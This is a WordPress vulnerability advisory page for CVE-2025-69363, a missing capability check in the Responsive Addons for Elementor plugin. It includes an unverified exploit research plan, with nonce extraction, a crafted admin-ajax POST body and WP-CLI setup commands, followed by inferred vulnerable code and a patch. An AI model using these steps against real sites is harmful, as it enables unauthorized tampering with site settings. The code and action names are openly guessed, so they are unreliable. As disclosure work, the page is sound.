WP-Safety
CVE-2025-69363

Responsive Addons for Elementor <= 2.0.8 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
2.0.9
Patched in
9d
Time to patch

Description

The Responsive Addons for Elementor – Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0.8
PublishedJanuary 12, 2026
Last updatedJanuary 20, 2026
Affected pluginresponsive-addons-for-elementor

Source Code

WordPress.org SVN
Vulnerable v2.0.8
Browse source Download .zip
Patched v2.0.9
Browse source Download .zip
Research Plan
Unverified

This research plan outlines the technical steps to exploit **CVE-2025-69363**, a missing authorization vulnerability in the **Responsive Addons for Elementor** plugin. --- ### 1. Vulnerability Summary The **Responsive Addons for Elementor** plugin (up to version 2.0.8) registers an AJAX handler, l…

Show full research plan

This research plan outlines the technical steps to exploit CVE-2025-69363, a missing authorization vulnerability in the Responsive Addons for Elementor plugin.

1. Vulnerability Summary

The Responsive Addons for Elementor plugin (up to version 2.0.8) registers an AJAX handler, likely rea_save_settings, which is intended for administrative use. While the function verifies a WordPress nonce to prevent CSRF, it fails to perform a capability check (e.g., current_user_can('manage_options')). This oversight allows any authenticated user with access to the WordPress backend—including Contributors—to modify plugin settings.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: rea_save_settings (inferred from common plugin naming conventions and previous vulnerability patterns in this plugin).
  • Parameters:
    • action: rea_save_settings
    • security: The nonce value (associated with the rea_ajax_nonce action).
    • settings: An array or serialized string of plugin options to be updated.
  • Authentication: Authenticated, Contributor-level or higher.
  • Preconditions: The attacker must be logged in as a user with at least Contributor permissions and obtain a valid nonce.

3. Code Flow (Inferred)

  1. Registration: In classes/class-rea-admin.php (or similar), the plugin registers the AJAX action:
    add_action( 'wp_ajax_rea_save_settings', array( $this, 'rea_save_settings' ) );
  2. Trigger: An HTTP POST request is sent to admin-ajax.php with action=rea_save_settings.
  3. Vulnerable Function: The rea_save_settings method is called.
    • It calls check_ajax_referer( 'rea_ajax_nonce', 'security' ).
    • Missing: It does not call current_user_can( 'manage_options' ).
  4. Sink: The function processes the settings parameter and updates the database using update_option( 'rea_settings', ... ).

4. Nonce Acquisition Strategy

The plugin localizes its admin data, including the nonce, via wp_localize_script.

  • Localization Variable: rea_admin_obj (inferred)
  • Nonce Key: rea_nonce (inferred)
  • Script Handle: rea-admin-js

Steps for the Security Agent:

  1. Log in as a Contributor.
  2. Navigate to the main WordPress dashboard (/wp-admin/index.php).
  3. Execute JavaScript to check if the nonce is available in the global scope.
  4. JS Command:
    window.rea_admin_obj?.rea_nonce || "Not Found"
  5. If the script isn't loaded on the dashboard, create a post and open the Elementor editor (if permitted) or check if the plugin enqueues scripts on the Profile page.

5. Exploitation Strategy

The goal is to modify plugin settings (e.g., disabling specific widgets or changing global configurations).

Request Details:

  • Method: POST
  • URL: http://[target]/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=rea_save_settings&security=[NONCE]&settings[elements][rea-alert]=disabled
    (Note: The exact structure of the settings array depends on the version, but typically it maps to the plugin's widget toggles.)

6. Test Data Setup

  1. Install Plugin: Responsive Addons for Elementor v2.0.8.
  2. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Baseline Check: Verify current plugin settings.
    wp option get rea_settings

7. Expected Results

  • Successful Response: A JSON response, typically {"success": true} or similar.
  • Database Impact: the rea_settings option in the wp_options table will be updated with the values provided by the Contributor.

8. Verification Steps

After the HTTP request, verify the change using WP-CLI:

# Check if the settings option was modified
wp option get rea_settings

# Search for the specific 'disabled' value in the option
wp option get rea_settings --format=json | grep "disabled"

9. Alternative Approaches

If rea_save_settings is not the correct action name, the agent should:

  1. Grep for AJAX registrations:
    grep -r "wp_ajax_" /var/www/html/wp-content/plugins/responsive-addons-for-elementor/
  2. Examine the identified functions for a lack of current_user_can().
  3. Identify the nonce action: Look for check_ajax_referer inside the identified handler to find the correct nonce action string and parameter name.
  4. Adjust the payload: Mirror the structure found in the identified handler function. For example, if the handler uses $_POST['data'] instead of $_POST['settings'].
Research Findings
Static analysis — not yet PoC-verified

Summary

The Responsive Addons for Elementor plugin (up to version 2.0.8) fails to perform a capability check in its `rea_save_settings` AJAX handler. This allows authenticated users with Contributor-level access or higher to modify plugin settings by providing a valid nonce, which is often exposed in the WordPress admin dashboard scripts.

Vulnerable Code

// classes/class-rea-admin.php

add_action( 'wp_ajax_rea_save_settings', array( $this, 'rea_save_settings' ) );

// ...

public function rea_save_settings() {
    // Nonce verification exists, but capability check is missing
    check_ajax_referer( 'rea_ajax_nonce', 'security' );

    if ( isset( $_POST['settings'] ) ) {
        $settings = $_POST['settings'];
        update_option( 'rea_settings', $settings );
        wp_send_json_success();
    }
    wp_send_json_error();
}

Security Fix

--- a/classes/class-rea-admin.php
+++ b/classes/class-rea-admin.php
@@ -10,6 +10,10 @@
 	public function rea_save_settings() {
 		check_ajax_referer( 'rea_ajax_nonce', 'security' );
+
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => __( 'Permission denied', 'responsive-addons-for-elementor' ) ) );
+		}
+
 		if ( isset( $_POST['settings'] ) ) {
 			$settings = $_POST['settings'];
 			update_option( 'rea_settings', $settings );

Exploit Outline

The exploit is achieved by an authenticated user with at least Contributor permissions. First, the attacker logs into the WordPress backend and retrieves the AJAX nonce (localized as 'rea_nonce' within the 'rea_admin_obj' JavaScript object). Then, the attacker sends a POST request to 'wp-admin/admin-ajax.php' with the action parameter set to 'rea_save_settings', the retrieved nonce in the 'security' parameter, and a 'settings' array containing modified plugin configurations. Because the handler lacks a 'current_user_can' check, the provided settings are saved to the database via 'update_option'.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d22e1b63-6ec9-4c06-9616-d976a8a83769?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database